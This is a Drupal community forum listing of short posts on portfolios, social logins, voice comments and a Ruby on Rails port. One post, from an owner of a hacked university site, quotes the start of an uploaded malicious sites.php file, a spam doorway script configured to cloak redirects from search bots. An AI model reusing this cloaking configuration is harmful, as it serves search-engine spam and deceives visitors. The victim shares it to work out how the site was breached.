This forum is for less technical discussions about the Drupal project, not for support questions.

Portfolio

All right, before anything consider that I am totally new to drupal. I understand how to install modules and that's about it. I would like to build a website where users can join, login and get build in portfolio which other users can see. I would also like my users to be able to post videos in their profile. Both portfolio and videos have to be searchable by registered users and non registered users. I found a "tutorial" for it that was pretty incomplete for portfolios.

Multiple login options for users

Hi Everyone

Good day, since last 6 days i tried almost everything existing on drupal.org (fb connect, O auth, Imap auth bla bla bla). But failed in making multiple login option for anonymous users.

All i want that user shud able to authenticate by facebook, Gmail, Hotmal, Yahoo etc and drupal shud handle there account and session settings nicely and smoothly. If some module already exist and i missed it, then please let me know. I really need it desperately.

studies

can anyone give me complete information regarding operations management???

shifting Drupal from PHP to ruby on rails

Dear everybody,
For more fast & better development of Drupal, we can shift Drupal from PHP to Ruby on rails. We can shift the core from PHP to ruby on rails & provide a layer so that existing modules do not become redundant.
Ruby on rails 3 is definitely a better language as compared to PHP.
Rgds
Mahesh

Voice Comments

Hi Friends,

I need Voice based comments(Audio coment) Feature in my application. I have tried http://drupal.org/project/riffly this module but does not work. Can any one suggest If any other module or any other way for Voice based comments .

Thank you for Advance.

Hari

Site Hacked? How ...... ????

A drupal site that I installed on a university server has been hacked - it appears that a file sites.php has been uploaded in the hack and it's spitting out spammy pages from a .cache directory. So I've never had a drupal site hacked in 7 years of drupal usage so I'm trying to figure out what shat the bed - carless permissions, university sysadmin setup incorrect etc ....

here is a part of the code in sites.php / also uses a comm.php file:


<?php
// REVISION: $Rev: 1153 $
error_reporting(0);
ini_set('display_errors', 0);
header('Content-type: text/html; charset=utf-8');
set_magic_quotes_runtime(0);

class RemotePage
{
var $myUrl = 'http://your-domain.com/door_sample/';
//var $feedUrl = 'http://www.your-feed-domain.com/path/to/${key}/';
var $cacheDir = '.cache';
var $varName = 'bs';
var $waitTimeout = 60; // seconds
var $useCurl = 0;

var $googleRefNumToAllowRedirect = 100;
var $googleRefNumToAllowCloak = 100;
var $cloakMethod = 4; // 1 - 404 old, 2 - hides redirect for bots, 3 - 404 new, 4 - hides redirect for bots and non-google-refs

var $keywordSeparator = '-';
var $defaultPage = 'index';
var $searchReferers = 'live|msn|yahoo|google|ask|aol';
var $botIps = Array(

Pages

Subscribe with RSS Subscribe to RSS - General discussion